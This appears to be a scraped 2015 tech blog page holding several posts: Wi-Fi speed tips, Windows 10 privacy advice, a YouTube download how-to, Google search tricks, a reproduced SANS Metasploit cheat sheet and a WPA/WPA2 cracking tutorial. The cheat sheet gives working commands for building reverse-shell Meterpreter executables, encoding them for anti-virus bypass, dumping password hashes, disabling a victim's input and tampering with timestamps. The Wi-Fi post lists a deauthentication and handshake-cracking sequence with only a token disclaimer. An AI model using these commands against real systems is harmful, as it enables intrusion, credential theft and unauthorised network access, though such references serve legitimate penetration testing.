Sunday, 20 September 2015

7 Wi-Fi Tweaks to Increase Your Speed

Chances are if you have a wireless internet connection at your home, you have had some trouble with the speed of the connection at least once before. That being said, a slow wireless connection can be frustrating to deal with. You are probably paying good money to your internet service provider, so slow speed is something you should not have to deal with, right? Well, the truth is wireless speed can be affected by a number of things. Luckily there are some Wi-Fi tweaks you can try that should help boost your speed and get you rolling in no time.

1. Reposition Your Router

The position of your wireless router plays a major role in the speed and strength of your wireless connection. If you are having trouble, you should try to reposition your router in a centrally located area, where the signal can equally reach each wireless device in your house. If your router is near an outside wall, try to move it closer to the middle of your house. Routers that are placed near outside walls can send some of the signal outside, which can risk your wireless connection’s strength and speed.

2. Purchase a Wireless Signal Repeater

Adding a wireless signal repeater to your home network can greatly increase the speed of your connection. A repeater works by extending your signal without having to add any additional wires. All you have to do is simply place the wireless repeater in a location that is between your router and your wireless device(s). It will instantly boost the wireless signal that is sent from the router to your devices, meaning faster speeds for you.

3. Install a New Antenna

Most wireless routers come standard with an omnidirectional antenna, meaning it broadcasts the wireless signal in a circular radius to reach various places in your home. If your router is in a perfectly centered location between all of your wireless devices, this is probably fine. But if your router isn’t perfectly centered among devices, you should think about replacing the existing antenna with a stronger one, known as a high-gain antenna. You can usually remove your old antenna and replace it with one of these stronger antennas to boost your signal strength, therefore increasing the speed of your connection. Another perk of a high-gain antenna is its ability to focus the wireless signal in any direction you prefer.

Increase Wireless internet Speed

4. Use One Brand of Equipment

You may not think that using different brands of equipment can reduce the speed of your wireless connection, but in reality it can. If you use different brands of equipment, your components may not work as efficiently. This is because many manufacturers of wireless networking equipment pre-install enhancements in all of their products. These enhancements can boost speed, but will only work if products from the same manufacturer are used simultaneously. If you are using various brands of equipment and your speed is suffering, this is definitely worth a try.

5. Reduce Frequency Interference

Many household electronics, such as cordless telephones and baby monitors, run at the same frequency as wireless routers. This means that these electronic devices can interfere with the wireless signal that is being broadcast from your router, which can affect the speed and performance of your connection. Check the box of your router to see what frequency it runs at, and try to avoid using other electronic devices that operate at the same frequency. You can also try to change the channel on your router to avoid frequency interference.

6. Check for Firmware or Driver Updates Regularly

The manufacturers of wireless routers and network adapters often release firmware or driver updates that can improve the function of your wireless connection. You can find and download these updates at the manufacturers’ websites. Updates are usually done to fix issues, add features, and strengthen your equipment’s performance. Check for these updates on a regular basis to make sure your firmware and drivers are always kept up to date.

7. Secure Your Wireless Network

If your network is not properly secured, neighbors could be using your signal. This can reduce the speed of your connection because you are in a sort, sharing the wireless signal. Set up secure passwords and some sort of wireless encryption that will prevent anyone else from accessing your wireless network. All of these Wi-Fi tweaks can greatly boost the speed of your wireless connection. If one of them does not seem to do the trick, try another or even a multitude of options. It may take a little time and patience, but once you figure out what works to speed up your connection, you will be happy you put forth the effort.

Sunday, 13 September 2015

Metasploit Cheat Sheet Free Download




Metasploit Cheat Sheet by Yori Kvitchko, Tom Hessman, Daniel Pendolino, & Ed Skoudis from Sans.org

Meterpreter Post Modules

With an available Meterpreter session, post modules can be run on the target machine.
Post Modules from Meterpreter
meterpreter > run post/multi/gather/env
Post Modules on a Backgrounded Session
msf > use post/windows/gather/hashdump
msf > show options
msf > set SESSION 1
msf > run

Useful Auxiliary Modules

Port Scanner:
msf > use auxiliary/scanner/portscan/
tcp
msf > set RHOSTS 10.10.10.0/24
msf > run
DNS Enumeration
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run
FTP Server
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run
Proxy Server
msf > use auxiliary/server/socks4
msf > run
Any proxied traffic that matches the subnet of a route will be routed through the session specified by route.
Use proxychains configured for socks4 to route any application’s traffic through a Meterpreter session.

msfvenom

The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former
msfpayload and msfencode tools. Run with
‘’-l payloads’ to get a list of payloads.
$ msfvenom –p [PayloadPath]
–f [FormatType]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]
Example
Reverse Meterpreter payload as an executable and
redirected into a file:
$ msfvenom -p windows/meterpreter/
reverse_tcp -f exe LHOST=10.1.1.1
LPORT=4444 > met.exe
Format Options (specified with –f)
–help-formats – List available output formats
exe – Executable
pl – Perl
rb – Ruby
raw – Raw shellcode
c – C code
Encoding Payloads with msfvenom
The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with ‘-l encoders‘ to get a list of encoders.
$ msfvenom -p [Payload] -e [Encoder] -f
[FormatType] -i [EncodeInterations]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]
Example
Encode a payload from msfpayload 5 times using shikataga-nai encoder and output as executable:
$ msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST=10.1.1.1 LPORT=4444 > mal.exe

Metasploit Console Basics (msfconsole)

Search for module:
msf > search [regex]
Specify and exploit to use:
msf > use exploit/[ExploitPath]
Specify a Payload to use:
msf > set PAYLOAD [PayloadPath]
Show options for the current modules:
msf > show options
- Advertisement -
Set options:
msf > set [Option] [Value]
Start exploit:
msf > exploit

Metasploit Meterpreter

Base Commands:
? / help: Display a summary of commands
exit / quit: Exit the Meterpreter session
sysinfo: Show the system name and OS type
shutdown / reboot: Self-explanatory
File System Commands:
cd: Change directory
lcd: Change directory on local (attacker’s) machine
pwd / getwd: Display current working directory
ls: Show the contents of the directory
cat: Display the contents of a file on screen
download / upload: Move files to/from the target machine
mkdir / rmdir: Make / remove directory
edit: Open a file in the default editor (typically vi)

Metasploit Meterpreter (contd)

Process Commands:
getpid: Display the process ID that Meterpreter is running inside
getuid: Display the user ID that Meterpreter is running with
ps: Display process list
kill: Terminate a process given its process ID
execute: Run a given program with the privileges
of the process the Meterpreter is loaded in
migrate: Jump to a given destination process ID
– Target process must have same or lesser privileges
– Target process may be a more stable process
– When inside a process, can access any files that
process has a lock on
Network Commands:
ipconfig: Show network interface information
portfwd: Forward packets through TCP session
route: Manage/view the system’s routing table
Misc Commands:
idletime: Display the duration that the GUI of the target machine has been idle
uictl [enable/disable] [keyboard/mouse]: Enable/disable either the mouse or keyboard of the target machine
screenshot: Save as an image a screenshot of the target machine
Additional Modules:
use [module]: Load the specified module
Example:
use priv: Load the priv module
hashdump: Dump the hashes from the box
timestomp:Alter NTFS file timestamps

Managing Sessions

Multiple Exploitation:
Run the exploit expecting a single session that is immediately backgrounded:
msf > exploit -z
Run the exploit in the background expecting one or more sessions that are immediately backgrounded:
msf > exploit –j
List all current jobs (usually exploit listeners):
msf > jobs –l
Kill a job:
msf > jobs –k [JobID]
Multiple Sessions:
List all backgrounded sessions: msf > sessions -l
Interact with a backgrounded session:msf > session -i [SessionID]
Background the current interactive session:meterpreter > <Ctrl+Z> or meterpreter > background
Routing Through Sessions:
All modules (exploits/post/aux) against the target subnet mask will be pivoted through this session.
msf > route add [Subnet to Route To]
[Subnet Netmask] [SessionID]

Is Windows 10 Spying On You? Sir.O Sings the Microsoft Service Agreement



Microsoft claims that it could be using some Windows updates to scan pirated games on users computer and block them completely.
Since few people can’t really understand what Microsoft’s trying to say in this service agreement, a YouTube user named Sir.O decided to sing section 7B, thus making it easier and to get the right message.

Hope this video is user-friendly and easier at some level. Let us know about your thoughts on comment section.

How To Block Windows 10 Data Collection




There are many apps to block Windows 10 data collection, but it’s almost hard to choose the best one since all the software claims to disable everything that tracks your latest OS.
In this tutorial we suggest the best software Spybot Anti-Beacon to use against Microsoft’s data collection. This tool has simple user interface and powerful.
This tool helps you to protect your privacy with one click install.

List of settings you can block:

  • telemetry hosts
  • services
  • group policies
  • disable Wi-Fi sense
  • P2P Widnows updates outside local network
  • application impact telemetry group police
All these can be block by clicking the Immunize button. InOptional tab you will be having some extra settings for OneDrive, Cortana and web search
Download Spybot Anti-Beacon to save your privacy right now.

Crack WPA & WPA2 with Aircrack-ng on Kali Linux



In this tutorial we are going to teach you How to crack WPA & WPA 2 with aircrack-ng on Kali Linux. We high recommend this for research or educational purpose only.
Note: This tutorial is only for educational purpose. Use this tool at your own risks, we are not responsible for any damage that cause you.

Things we used for cracking WPA & WPA2:

Command to crack WPA & WPA2:

airmon-ng 
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
airodump-ng wlan0 
airodump-ng -c [channel id] --write [any name] --bssid [bssid of the wifi] wlan0
aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0
aircrack-ng -w [wordlist file] -b [bssid] [any name]-01.cap
sudo ifconfig wlan0 down
sudo iwcofnig wlan0 mode monitor
sudo ifconfig wlan0 up 

Here is a YouTube video on How to crack WPA and WPA2 with Aircrack-ng on Kali Linux:

In the about tutorial we EVER hack our own systems as a proof of concept and never engage in any black hat activity.

Friday, 28 August 2015

How to Save YouTube Videos Directly To iPhone’s Camera Roll and Watch Offline

 YouTube is the most famous and largest video library available online, it allows us to search, stream and upload our favorite videos at the most easier way. However, YouTube is strict and changed its terms and conditions recently to prevent users from downloading videos to watch offline. However, there is still an alternative way to get this fixed by using the third party tool to save your favorite YouTube videos into PC and then sync them over iTunes to iPhone or iPad. Unfortunately, all this method makes it inconvenient and takes time to do this transition. In order to have a short cut way to save your favorite videos directly into iPhone where you can watch them at any time in offline mode, we found an app named “Video Download Browser” which able to downloading in extremely simple and convenient way. This app is Free of charge.
How to Save YouTube Videos Directly To iPhone’s Camera Roll and Watch Offline

Here how to save YouTube videos into iPhone and watch it offline
  1. Head to iTunes App Store from iPhone, search for “Video Download Browser” and then download and install it.
  2. Once done installed, open up the app and it will present with multiple options that you can choose from to save your favorite video.
  3. You can either use the browser to search your YouTube video or simply copy the URL link from your favorite videos list and then paste in into Video Download Browser.
  4. Once successfully loaded the video you want to save, directly play the video and the app will automatically bring up a “Save to Memory” option in the bottom of your screen.
  5. Simply click on the tab and a red badge will appear to show that the download has commenced. If for some reason, the save option didn’t appear, you may manually click the “download” button which next to the “back/forward” buttons on the bottom taskbar, it would show up the options to save video or add into bookmarks.
  6. Next, go to Videos pane on your app after done download and navigate the video you want to save. Click on the information icon beside the video’s name and select “Save to Camera Roll”.
  7. Now you can watch your favorite YouTube video in offline mode by select them directly from your Camera Roll in your own iPhone. For additional info, you can choose to lock your videos in confidential way by setting up a passcode on the videos pane.

Google - I'm Feeling Lucky Tricks & Jokes

Google is the search engine of choice for most users. This is well represented by the fact that Google averages one billion unique visitors every month. A reason for this popularity is Google's characteristic to integrate simplicity with usability.

Another major reason for this popularity is Google's minimalistic homepage, which consists of a search bar and two buttons, Search and I'm Feeling Lucky. We all know what the search button does, it takes us to a search results page consisting of top ten results that match our query. The "I'm Feeling Lucky" button on the other hand takes you to the top ranking page in the search results for a particular query.
Im feeling lucky

Some webpages use this behavior to create some amazing and funny results. Here is a list of few such keywords that have some funny websites at the first position in Google. To use these tricks, open Google's homepage, type in the phrase and hit the I'm feeling lucky button. To use the I'm feeling lucky button, you have to disable Google Instant.

Google Gravity
I am feeling lucky, Google
The force of gravity is non-existent in cyber space. Google gravity makes you realize how Google would have been if gravity had been effective on the internet as well. Just type Google gravity in the search bar and press the I'm feeling lucky button. This will take you to the Google gravity page which, at first look, might appear to be the Google homepage itself. Wait for a few seconds and you will realize why this Chrome experiment is called Google gravity. Although the website lists it as a Chrome experiment, it works on Mozilla Firefox as well, although it does not work on IE8 and previous versions of IE.

Google Sphere
Want to see images on Google dance in circular motion? Google sphere is the phrase for that. This phrase will take you to the Google sphere Chrome experiment. Google sphere is a modified version of Image search that adds a bit of fun to your regular search. This Chrome experiment, just like the previous one, works on Chrome, Firefox and IE9.

Epic Google 
Epic Google will take you to a growing version of Google that will continue to increase in size until it becomes too large to read.

I'm feeling lucky tricks
Enable Pirate language in Google
Remember the Facebook Pirate language trick? Google too has their own pirate version to compete with that of Facebook's. Just use the Google Pirate phrase or directly head over toGoogle Pirate.

Google Rainbow
This phrase will take you to a Google search homepage in which each element changes its color rapidly to create the rainbow effect. The search result page obtained for queries is very annoying too as it contains a very loud color combination of red, blue and green. 

Annoying Google
Want to get annoyed while searching on Google? This one is for you. This phrase will take you to a Google search homepage with each word having alternate capital and small letters making everything a bit too hard to read.

2204355 
Are you already familiar with the age old internet prank called rick-rolling and want to discover something new? Chicken rolling is for you. Try this new way of trapping unsuspecting internet users by typing the code 2204355 in the Google search box and hitting the "Lucky button."

LOL Limewire 
Type in LOL Limewire in Google and you will be taken to a .swf file claiming that you are a pirate and telling you to "do what you want cause a pirate is free." Funny!

Google funny feeling lucky tricks
Find Chuck Norris
This one is for all fans of Chuck Norris jokes. We all know that you don't find Chuck Norris, he finds you. The find Chuck Norris phrase proves the fact further.

Who is the cutest?
Want to know who is the cutest person in the world? Just use this phrase. This one will definitely make you smile.

Most of these websites are not owned by Google. They were created independently to achieve these effects.